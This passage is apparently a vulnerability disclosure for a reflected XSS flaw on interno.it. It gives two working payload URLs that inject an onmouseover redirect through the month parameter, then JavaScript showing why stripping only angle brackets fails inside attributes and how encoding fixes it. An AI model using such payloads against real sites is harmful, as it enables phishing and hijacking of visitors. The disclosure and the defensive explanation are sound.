various characters are replaced, but the XSS is still possible and we can redirect the user wherever we want. The XSS is triggered by an onmouseover handler injected on the available images: the month parameter is reflected inside an HTML attribute, and a double quote (%22) in the value closes that attribute, so the rest of the input is parsed as new attributes on the tag. In this case we send the user to google.

XSS:
http://www.interno.it/mininterno/site/it/sezioni/sala_stampa/gallery/2010/0934_maroni_in_visita_al_cairo/index.html?month=5%22%20onmouseover=%22location.href='http://www.google.com';

Same problem in other pages of the website:
http://www.interno.it/mininterno/site/it/sezioni/sala_stampa/gallery/2010/0934_maroni_in_visita_al_cairo/9.html?month=5%22%20onmouseover=%22location.href=%27http://www.google.com%27

Note: we can also change the stylesheet and do other things. This is just a sample.
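The following is an added illustration, not the interno.it site's real code: a stand-in template that echoes the month parameter into an attribute after a filter that only strips angle brackets (an assumption about what "various characters are replaced" means), beside a hardened version that attribute-encodes the value. It extracts the payload from the first URL above, renders both variants, and lists which attributes a browser would see on the tag.

```javascript
// Added example (not the site's code). Shows why stripping "<" and ">" does
// not stop XSS when user input lands inside an HTML attribute value.

// The first advisory URL, used here only as sample input.
const SAMPLE_URL =
  "http://www.interno.it/mininterno/site/it/sezioni/sala_stampa/gallery/2010/" +
  "0934_maroni_in_visita_al_cairo/index.html" +
  "?month=5%22%20onmouseover=%22location.href='http://www.google.com';";

// Pull the month parameter out of the URL the way a server would see it
// (percent-decoded): 5" onmouseover="location.href='http://www.google.com';
function monthFromUrl(url) {
  return new URL(url).searchParams.get("month");
}

// Assumed stand-in for the site's filter: removes angle brackets so that a
// <script> tag cannot be injected, but leaves quotes untouched.
function naiveFilter(value) {
  return String(value).replace(/[<>]/g, "");
}

// Vulnerable render: the filtered value is placed inside href="...". A double
// quote in the input terminates the attribute and what follows becomes new
// attributes, here an onmouseover handler. The template's own closing quote
// then terminates the injected handler, which is why the payload ends in ";".
function renderVulnerable(month) {
  return `<a href="index.html?month=${naiveFilter(month)}"><img src="9.jpg"></a>`;
}

// Hardened render: encode every character that can end or alter an attribute
// value. The injected quote becomes &quot; and stays inside the href.
function escapeAttr(value) {
  const map = { "&": "&amp;", "<": "&lt;", ">": "&gt;", '"': "&quot;", "'": "&#39;" };
  return String(value).replace(/[&<>"']/g, (c) => map[c]);
}

function renderHardened(month) {
  return `<a href="index.html?month=${escapeAttr(month)}"><img src="9.jpg"></a>`;
}

// Minimal attribute scanner for the first <a ...> tag: returns the attribute
// names a browser would assign, enough to show whether onmouseover got in.
function attributeNames(html) {
  const tagBody = html.match(/<a\s([^>]*)>/)[1];
  const re = /([a-zA-Z-]+)=("[^"]*"|'[^']*'|[^\s"']+)/g;
  const names = [];
  let m;
  while ((m = re.exec(tagBody)) !== null) {
    names.push(m[1].toLowerCase());
  }
  return names;
}

// Stand-alone demo.
const payload = monthFromUrl(SAMPLE_URL);
console.log("decoded month :", payload);
console.log("vulnerable    :", renderVulnerable(payload));
console.log("  attributes  :", attributeNames(renderVulnerable(payload)));
console.log("hardened      :", renderHardened(payload));
console.log("  attributes  :", attributeNames(renderHardened(payload)));
```

The point of the two renders is context: an output filter that is "good enough" for text nodes is not good enough for attribute values, where `"` (and `'` in single-quoted attributes) is the character that matters. Encoding for the attribute context at the point of output is what closes the hole; the payload in the advisory URLs stays a harmless literal inside the href.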